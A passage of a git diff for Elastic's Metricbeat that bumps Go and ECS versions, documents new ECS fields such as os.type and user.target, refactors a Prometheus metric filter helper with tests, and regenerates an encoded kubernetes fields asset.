common.MapStr { +func (t *Template) generateComponent(properties common.MapStr, dynamicTemplates []common.MapStr) common.MapStr { return common.MapStr{ "template": common.MapStr{ "mappings": buildMappings( @@ -302,8 +298,8 @@ func (t *Template) generateComponent(properties common.MapStr) common.MapStr { } } -func (t *Template) generateIndex(properties common.MapStr) common.MapStr { - tmpl := t.generateComponent(properties) +func (t *Template) generateIndex(properties common.MapStr, dynamicTemplates []common.MapStr) common.MapStr { + tmpl := t.generateComponent(properties, dynamicTemplates) tmpl["priority"] = t.priority keyPattern, patterns := buildPatternSettings(t.esVersion, t.GetPattern()) tmpl[keyPattern] = patterns diff --git a/metricbeat/Dockerfile b/metricbeat/Dockerfile index 4b76f73bafb3..4d96de35265a 100644 --- a/metricbeat/Dockerfile +++ b/metricbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt update \ diff --git a/metricbeat/Jenkinsfile.yml b/metricbeat/Jenkinsfile.yml index 2bdb1218a5d2..70874ab12779 100644 --- a/metricbeat/Jenkinsfile.yml +++ b/metricbeat/Jenkinsfile.yml @@ -75,3 +75,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false ## e2e is enabled only for x-pack beats diff --git a/metricbeat/cmd/root.go b/metricbeat/cmd/root.go index 2681a2a381d6..8da887270bbc 100644 --- a/metricbeat/cmd/root.go +++ b/metricbeat/cmd/root.go @@ -43,7 +43,7 @@ const ( Name = "metricbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // RootCmd to handle beats cli diff --git a/metricbeat/docs/fields.asciidoc b/metricbeat/docs/fields.asciidoc index e3359559097b..96dff72d890d 100644 --- a/metricbeat/docs/fields.asciidoc +++ b/metricbeat/docs/fields.asciidoc @@ -2326,7 +2326,7 @@ type: scaled_float -- -*`aws.ec2.diskio.read.ops`*:: +*`aws.ec2.diskio.read.count`*:: + -- Total completed read operations from all instance store volumes available to the instance in collection period. @@ -2336,7 +2336,7 @@ type: long -- -*`aws.ec2.diskio.read.ops_per_sec`*:: +*`aws.ec2.diskio.read.count_per_sec`*:: + -- Completed read operations per second from all instance store volumes available to the instance in a specified period of time. @@ -2346,7 +2346,7 @@ type: long -- -*`aws.ec2.diskio.write.ops`*:: +*`aws.ec2.diskio.write.count`*:: + -- Total completed write operations to all instance store volumes available to the instance in collection period. @@ -2356,7 +2356,7 @@ type: long -- -*`aws.ec2.diskio.write.ops_per_sec`*:: +*`aws.ec2.diskio.write.count_per_sec`*:: + -- Completed write operations per second to all instance store volumes available to the instance in a specified period of time. @@ -11734,7 +11734,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -11787,7 +11787,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -12978,6 +12978,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -14052,6 +14065,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -14222,6 +14248,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -17373,6 +17412,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -17548,6 +17588,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -17558,6 +17711,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -17661,6 +17927,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -17777,6 +18156,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- @@ -29807,6 +30199,46 @@ type: keyword Node unschedulable status +type: boolean + +-- + +*`kubernetes.node.status.memory_pressure`*:: ++ +-- +Node MemoryPressure status + + +type: boolean + +-- + +*`kubernetes.node.status.disk_pressure`*:: ++ +-- +Node DiskPressure status + + +type: boolean + +-- + +*`kubernetes.node.status.out_of_disk`*:: ++ +-- +Node OutOfDisk status + + +type: boolean + +-- + +*`kubernetes.node.status.pid_pressure`*:: ++ +-- +Node PIDPressure status + + type: boolean -- diff --git a/metricbeat/docs/modules/appsearch.asciidoc b/metricbeat/docs/modules/appsearch.asciidoc index 8c42f2a81521..068ee60bedbd 100644 --- a/metricbeat/docs/modules/appsearch.asciidoc +++ b/metricbeat/docs/modules/appsearch.asciidoc @@ -10,7 +10,10 @@ beta[] This is the App Search module. - +[NOTE] +===== +This module does not support collecting data from App Search running on {ecloud}. +===== [float] === Example configuration diff --git a/metricbeat/docs/modules/system.asciidoc b/metricbeat/docs/modules/system.asciidoc index bdfe4bbe84c4..315cae1201b0 100644 --- a/metricbeat/docs/modules/system.asciidoc +++ b/metricbeat/docs/modules/system.asciidoc @@ -178,6 +178,9 @@ metricbeat.modules: period: 10s processes: ['.*'] + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" + # Configure the metric types that are included by these metricsets. cpu.metrics: ["percentages","normalized_percentages"] # The other available option is ticks. core.metrics: ["percentages"] # The other available option is ticks. diff --git a/metricbeat/helper/prometheus/metric.go b/metricbeat/helper/prometheus/metric.go index a040ed65dae4..5f3f1199f31e 100644 --- a/metricbeat/helper/prometheus/metric.go +++ b/metricbeat/helper/prometheus/metric.go @@ -79,10 +79,11 @@ type MetricOption interface { Process(field string, value interface{}, labels common.MapStr) (string, interface{}, common.MapStr) } -// OpFilter only processes metrics matching the given filter -func OpFilter(filter map[string]string) MetricOption { - return opFilter{ - labels: filter, +// OpFilterMap only processes metrics matching the given filter +func OpFilterMap(label string, filterMap map[string]string) MetricOption { + return opFilterMap{ + label: label, + filterMap: filterMap, } } @@ -331,18 +332,22 @@ func (m *infoMetric) GetField() string { return "" } -type opFilter struct { - labels map[string]string +type opFilterMap struct { + label string + filterMap map[string]string } -// Process will return nil if labels don't match the filter -func (o opFilter) Process(field string, value interface{}, labels common.MapStr) (string, interface{}, common.MapStr) { - for k, v := range o.labels { - if labels[k] != v { - return "", nil, nil +// Called by the Prometheus helper to apply extra options on retrieved metrics +// Check whether the value of the specified label is allowed and, if yes, return the metric via the specified mapped field +// Else, if the specified label does not match the filter, return nil +// This is useful in cases where multiple Metricbeat fields need to be defined per Prometheus metric, based on label values +func (o opFilterMap) Process(field string, value interface{}, labels common.MapStr) (string, interface{}, common.MapStr) { + for k, v := range o.filterMap { + if labels[o.label] == k { + return fmt.Sprintf("%v.%v", field, v), value, labels } } - return field, value, labels + return "", nil, nil } type opLowercaseValue struct{} diff --git a/metricbeat/helper/prometheus/prometheus_test.go b/metricbeat/helper/prometheus/prometheus_test.go index 974f51f1a10a..f044c2f422f8 100644 --- a/metricbeat/helper/prometheus/prometheus_test.go +++ b/metricbeat/helper/prometheus/prometheus_test.go @@ -397,9 +397,36 @@ func TestPrometheus(t *testing.T) { msg: "Label metrics, filter", mapping: &MetricsMapping{ Metrics: map[string]MetricMap{ - "first_metric": LabelMetric("first.metric", "label4", OpLowercaseValue(), OpFilter(map[string]string{ - "foo": "filtered", - })), + "first_metric": LabelMetric("first.metric", "label4", OpFilterMap( + "label1", + map[string]string{"value1": "foo"}, + )), + }, + Labels: map[string]LabelMap{ + "label1": Label("labels.label1"), + }, + }, + expected: []common.MapStr{ + common.MapStr{ + "first": common.MapStr{ + "metric": common.MapStr{ + "foo": "FOO", + }, + }, + "labels": common.MapStr{ + "label1": "value1", + }, + }, + }, + }, + { + msg: "Label metrics, filter", + mapping: &MetricsMapping{ + Metrics: map[string]MetricMap{ + "first_metric": LabelMetric("first.metric", "label4", OpLowercaseValue(), OpFilterMap( + "foo", + map[string]string{"Filtered": "filtered"}, + )), }, Labels: map[string]LabelMap{ "label1": Label("labels.label1"), diff --git a/metricbeat/metricbeat.reference.yml b/metricbeat/metricbeat.reference.yml index 5fcd2492785c..b2cc7ce7c1be 100644 --- a/metricbeat/metricbeat.reference.yml +++ b/metricbeat/metricbeat.reference.yml @@ -79,6 +79,9 @@ metricbeat.modules: period: 10s processes: ['.*'] + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" + # Configure the metric types that are included by these metricsets. cpu.metrics: ["percentages","normalized_percentages"] # The other available option is ticks. core.metrics: ["percentages"] # The other available option is ticks. diff --git a/metricbeat/module/http/_meta/Dockerfile b/metricbeat/module/http/_meta/Dockerfile index 9d104c32a7e5..64d1de65fe0f 100644 --- a/metricbeat/module/http/_meta/Dockerfile +++ b/metricbeat/module/http/_meta/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 COPY test/main.go main.go diff --git a/metricbeat/module/kubernetes/fields.go b/metricbeat/module/kubernetes/fields.go index aec239344fdc..0b87da7ad9c6 100644 --- a/metricbeat/module/kubernetes/fields.go +++ b/metricbeat/module/kubernetes/fields.go @@ -32,5 +32,5 @@ func init() { // AssetKubernetes returns asset data. // This is the base64 encoded gzipped contents of module/kubernetes. func AssetKubernetes() string { - return "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" + return "eJzsXU9zJKeSv8+nIOY03pD7sLGxhzlshK153qewPdZKGvuwsdFGVdndWFVQBkqafp9+A+ofVQUU1UW3NFL3weGR1Pn7kZlAkkDyPXqA/Uf0UN4DpyBBvENIEpnBR/T+5/aH798hlIJIOCkkYfQj+q93CCHU/QHKQXKSqG9zyAAL+Ii2+B1CAqQkdCs+ov99L0T2/gK930lZvP8/9bsd43KdMLoh249ogzMB7xDaEMhS8VEDfI8ozmFAT33kvlAInJVF/RMLPfW5ohvGc6x+jDBNkZBYEiFJIhDboIKlAuWY4i2k6H5v4KxqCSYbkxEuiAD+CLz9jY2Uh9hAfz9cX6FKoKHK5tNXafMZUjPpcfi7BCFXSUaAyt6fNDwfYP/EeDr4nYet+lxqeQi+QlIquzZAwsuCg2AlTyAej5tKMqTIKntIQJT3x+TgEj+ikbAiPgGkxaIPSVYKCfxCg4oCJ3DRauc7L69H4PfxaP3z7u4ajUSOPJOlEVWhMUcix5hUApVrBRTfDDUHDYFGEEMuKd+veUnj0fgD5A44kjtoMFApQKCU79EQaEjmgdAh2gImPxOaqtG1lj5hkrxgNO4Y1YhEO0zTTI1ShlK8bIZj90ImalDXItGGNZYJGCYegQvCIrpGLbBlMW7mkILWXG9yW0ih6SQ2wUPwHOSORfRH3TEtQkeNZiKiG7YtHkptYAvOEhDCimhzRNt8b8pLinIlIBn9vpGZsvI+G457o4ZcXn9BAhJG0yGzDimHnPG9mtZJClSu7vddZDbGzRjdWn5ZxWUfkevLPVY/qj9ChKIGs+YwRfGRcFni7JQMa8gpgptUrFgBdJWwcjT6TVLrQX8u83vgasRVAtGGZND+AeNuMwqJuYQ0gtPcVg6DBKEJ6CGmdu4Gw9oB1EIgmve382rJdbS/KsWqAJ4AlSSD1b85W8ju/4LEZoDqF+s5emj6fEMC5SThrO5OqKPjtomtGaLMF9rHzysp8zLDkjwCskH5qC133oaalqRnqEb+JBFB/gVVz45p6TmkFYNZZjUo+6waY0DqcZxpYoPmMSysxHs4iIJRAc9q3orCHPuOSR/fwCbLYAuPicYwcU3FLmoc9Mf3qaZh1pmmSoOsfPhObMdU2yQ+EBbIkmUZNDlekBcxWrDmbkywDEugyf4QT7ZZSzQCL5SLKgbVv0kVOJlz0iSleC7UcqLzFXNfJg8gTzrl1NB